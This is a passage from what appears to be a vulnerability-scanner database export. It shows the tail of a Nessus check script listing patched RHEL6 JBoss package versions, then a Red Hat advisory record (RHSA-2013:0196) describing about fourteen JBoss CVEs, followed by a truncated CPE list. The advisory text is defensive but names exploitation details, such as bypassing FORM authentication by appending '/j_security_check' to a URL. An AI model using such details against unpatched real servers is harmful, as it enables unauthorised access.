(rpm_check(release:\"RHEL6\", reference:\"hibernate3-annotations-javadoc-3.4.0-3.6.GA_CP05.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", 
reference:\"hibernate3-entitymanager-3.4.0-4.5.GA_CP05.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate3-entitymanager-javadoc-3.4.0-4.5.GA_CP05.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate3-javadoc-3.3.2-1.9.GA_CP05.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate3-search-3.1.1-2.5.GA_CP05.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate3-search-javadoc-3.1.1-2.5.GA_CP05.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hsqldb-1.8.0.10-11_patch_01.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jacorb-jboss-2.3.2-2.jboss_1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"javassist-3.12.0-6.SP1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-aop2-2.1.6-5.CP06.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-bootstrap-1.0.2-1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-cache-core-3.2.11-1.GA.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-cache-pojo-3.0.1-1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-cl-2.0.11-4.GA.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-cluster-ha-server-api-1.2.1-2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-common-beans-1.0.1-2.Final.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-common-core-2.2.21-1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"jboss-eap5-native-5.2.0-6.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jboss-eap5-native-5.2.0-6.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb-3.0-api-5.0.2-2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-cache-1.0.0-4.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", 
reference:\"jboss-ejb3-core-1.3.9-0.4.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-ext-api-1.0.0-4.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-ext-api-impl-1.0.0-3.7.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-interceptors-1.0.9-0.2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-metadata-1.0.0-3.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-metrics-deployer-1.1.1-0.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-security-1.0.2-0.5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-timeout-0.1.1-0.8.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-timeout-3.0-api-0.1.1-0.8.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-timeout-spi-0.1.1-0.8.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-transactions-1.0.2-1.6.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-jacc-1.1-api-5.0.2-2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-jad-1.2-api-5.0.2-2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-jaspi-1.0-api-5.0.2-2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-javaee-5.0.2-2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-javaee-poms-5.0.2-2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-jaxrpc-api_1.1_spec-1.0.0-16.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-jca-1.5-api-5.0.2-2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-jms-1.1-api-5.0.2-2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-jpa-deployers-1.0.0-6.SP2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-logmanager-1.1.2-6.GA_patch_01.ep5.el6\")) 
flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-naming-5.0.3-5.CP02.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-reflect-2.0.4-2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-remoting-2.5.4-10.SP4.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-seam2-2.2.6.EAP5-14.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-seam2-docs-2.2.6.EAP5-14.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-seam2-examples-2.2.6.EAP5-14.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-seam2-runtime-2.2.6.EAP5-14.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-security-negotiation-2.1.3-1.GA.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-security-spi-2.0.5-4.SP3_1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-transaction-1.0.1-api-5.0.2-2.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-vfs2-2.2.1-4.GA.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-web-5.2.0-16.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-web-client-5.2.0-16.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-web-tp-licenses-5.2.0-8.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-web-ws-native-5.2.0-16.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-ws-cxf-ewp-5.2.0-11.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbosssx2-2.0.5-8.3.SP3_1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossts-4.6.1-12.CP13.7.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossts-javadoc-4.6.1-12.CP13.7.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossweb-2.1.13-2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", 
reference:\"jbossweb-el-1.0-api-2.1.13-2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossweb-jsp-2.1-api-2.1.13-2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossweb-lib-2.1.13-2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossweb-servlet-2.5-api-2.1.13-2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossws-3.1.2-13.SP15_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossws-common-1.1.0-9.SP10.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossws-framework-3.1.2-9.SP13.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossws-spi-1.1.2-6.SP8.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jgroups-2.6.22-1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jopr-embedded-1.3.4-19.SP6.9.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jopr-hibernate-plugin-3.0.0-14.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jopr-jboss-as-5-plugin-3.0.0-16.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jopr-jboss-cache-v3-plugin-3.0.0-15.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"mod_cluster-demo-1.0.10-12.2.GA_CP04.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"mod_cluster-jbossas-1.0.10-12.2.GA_CP04.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"mod_cluster-jbossweb2-1.0.10-12.2.GA_CP04.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"mod_cluster-tomcat6-1.0.10-12.2.GA_CP04.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", 
reference:\"picketlink-federation-2.1.5-3.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"picketlink-quickstarts-2.1.5-1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"picketlink-quickstarts-idp-2.1.5-1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"picketlink-quickstarts-pdp-2.1.5-1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"picketlink-quickstarts-sts-2.1.5-1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"resteasy-1.2.1-17.CP02_patch02.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"resteasy-examples-1.2.1-17.CP02_patch02.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"resteasy-javadoc-1.2.1-17.CP02_patch02.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"resteasy-manual-1.2.1-17.CP02_patch02.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rh-ewp-docs-5.2.0-11.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rh-ewp-docs-examples-5.2.0-11.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-ant-bundle-common-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-common-parent-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-core-client-api-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-core-comm-api-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-core-dbutils-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-core-domain-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-core-gui-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-core-native-system-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if 
(rpm_check(release:\"RHEL6\", reference:\"rhq-core-parent-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-core-plugin-api-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-core-plugin-container-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-core-plugindoc-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-core-util-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-filetemplate-bundle-common-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-helpers-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-jboss-as-common-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-jmx-plugin-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-modules-parent-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-parent-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-platform-plugin-3.0.0-14.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-plugin-validator-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-pluginAnnotations-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-pluginGen-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-plugins-parent-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhq-rtfilter-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"spring2-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"spring2-agent-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", 
reference:\"spring2-all-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"spring2-aop-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"spring2-beans-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"spring2-context-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"spring2-core-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"wss4j-1.5.12-4_patch_02.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xerces-j2-2.9.1-10.patch02.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xerces-j2-scripts-2.9.1-10.patch02.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xml-commons-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xml-commons-jaxp-1.1-apis-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xml-commons-jaxp-1.2-apis-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xml-commons-jaxp-1.3-apis-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xml-commons-resolver10-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xml-commons-resolver11-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xml-commons-resolver12-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xml-commons-which10-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xml-commons-which11-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xml-security-1.5.1-2.ep5.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = 
pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"aopalliance / apache-cxf / bsh2 / bsh2-bsf / glassfish-jaxb / etc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:47:57", "description": "Updated JBoss Enterprise Web Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThis JBoss Enterprise Web Platform 5.2.0 release serves as a replacement for JBoss Enterprise Web Platform 5.1.2, and includes bug fixes and enhancements. As JBoss Enterprise Web Platform is a subset of JBoss Enterprise Application Platform, refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/\n\nAn attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. 
Refer to the Solution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used. A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. (CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending '/j_security_check' to the end of a URL.\n(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote attacker to hijack the authenticated JMX Console session of an administrator. (CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against victims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if no security context was provided. Depending on the deployed applications, this could possibly allow a remote attacker to hijack the credentials of a previously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific roles did not actually restrict access, allowing remote attackers with valid JMX Invoker credentials to perform JMX operations accessible to roles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local users to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain text when an exception was thrown. This could lead to the exposure of authentication credentials if local users had permissions to read the log file. 
(CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow unauthenticated access by default in some profiles. The security interceptor's second layer of authentication prevented direct exploitation of this flaw. If the interceptor was misconfigured or inadvertently disabled, this flaw could lead to arbitrary code execution in the context of the user running the JBoss server.\n(CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication when a JGroups channel was started, allowing attackers on the adjacent network to read diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call if a null password was provided. In non-default configurations this could possibly lead to a remote attacker hijacking a previously-authenticated user's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for reporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575. 
CVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by Red Hat.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-11-08T00:00:00", "type": "nessus", "title": "RHEL 5 : JBoss EWP (RHSA-2013:0196)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:aopalliance", "p-cpe:/a:redhat:enterprise_linux:apache-cxf", "p-cpe:/a:redhat:enterprise_linux:bsh2", "p-cpe:/a:redhat:enterprise_linux:bsh2-bsf", "p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb", "p-cpe:/a:redhat:enterprise_linux:google-guice", "p-cpe:/a:redhat:enterprise_linux:hibernate3", "p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations", "p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager", "p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-search", "p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc", "p-cpe:/a:redhat:enterprise_linux:jacorb-jboss", "p-cpe:/a:redhat:enterprise_linux:javassist", "p-cpe:/a:redhat:enterprise_linux:jboss-aop2", "p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap", "p-cpe:/a:redhat:enterprise_linux:jboss-cache-core", "p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo", "p-cpe:/a:redhat:enterprise_linux:jboss-cl", "p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api", "p-cpe:/a:redhat:enterprise_linux:jboss-common-beans", 
"p-cpe:/a:redhat:enterprise_linux:jboss-common-core", "p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions", "p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-javaee", "p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms", "p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec", "p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers", "p-cpe:/a:redhat:enterprise_linux:jboss-logmanager", "p-cpe:/a:redhat:enterprise_linux:jboss-naming", "p-cpe:/a:redhat:enterprise_linux:jboss-reflect", "p-cpe:/a:redhat:enterprise_linux:jboss-remoting", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime", "p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation", "p-cpe:/a:redhat:enterprise_linux:jboss-security-spi", "p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-vfs2", 
"p-cpe:/a:redhat:enterprise_linux:jbossas-web", "p-cpe:/a:redhat:enterprise_linux:jbossas-web-client", "p-cpe:/a:redhat:enterprise_linux:jbossas-web-tp-licenses", "p-cpe:/a:redhat:enterprise_linux:jbossas-web-ws-native", "p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf-ewp", "p-cpe:/a:redhat:enterprise_linux:jbosssx2", "p-cpe:/a:redhat:enterprise_linux:jbossts", "p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc", "p-cpe:/a:redhat:enterprise_linux:jbossweb", "p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api", "p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api", "p-cpe:/a:redhat:enterprise_linux:jbossweb-lib", "p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api", "p-cpe:/a:redhat:enterprise_linux:jbossws", "p-cpe:/a:redhat:enterprise_linux:jbossws-common", "p-cpe:/a:redhat:enterprise_linux:jbossws-framework", "p-cpe:/a:redhat:enterprise_linux:jbossws-spi", "p-cpe:/a:redhat:enterprise_linux:jgroups", "p-cpe:/a:redhat:enterprise_linux:jopr-embedded", "p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin", "p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin", "p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-native", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6", "p-cpe:/a:redhat:enterprise_linux:picketlink-federation", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts", "p-cpe:/a:redhat:enterprise_linux:resteasy", "p-cpe:/a:redhat:enterprise_linux:resteasy-examples", "p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc", "p-cpe:/a:redhat:enterprise_linux:resteasy-manual", "p-cpe:/a:redhat:enterprise_linux:rh-ewp-docs", 
"p-cpe:/a:redhat:enterprise_linux:rh-ewp-docs-examples", "p-cpe:/a:redhat:enterprise_linux:rhq", "p-cpe:/a:redhat:enterprise_linux:rhq-common-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-domain", "p-cpe:/a:redhat:enterprise_linux:rhq-core-gui", "p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system", "p-cpe:/a:redhat:enterprise_linux:rhq-core-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container", "p-cpe:/a:redhat:enterprise_linux:rhq-core-util", "p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common", "p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin", "p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin", "p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent", "p-cpe:/a:redhat:enterprise_linux:spring2", "p-cpe:/a:redhat:enterprise_linux:spring2-agent", "p-cpe:/a:redhat:enterprise_linux:spring2-all", "p-cpe:/a:redhat:enterprise_linux:spring2-aop", 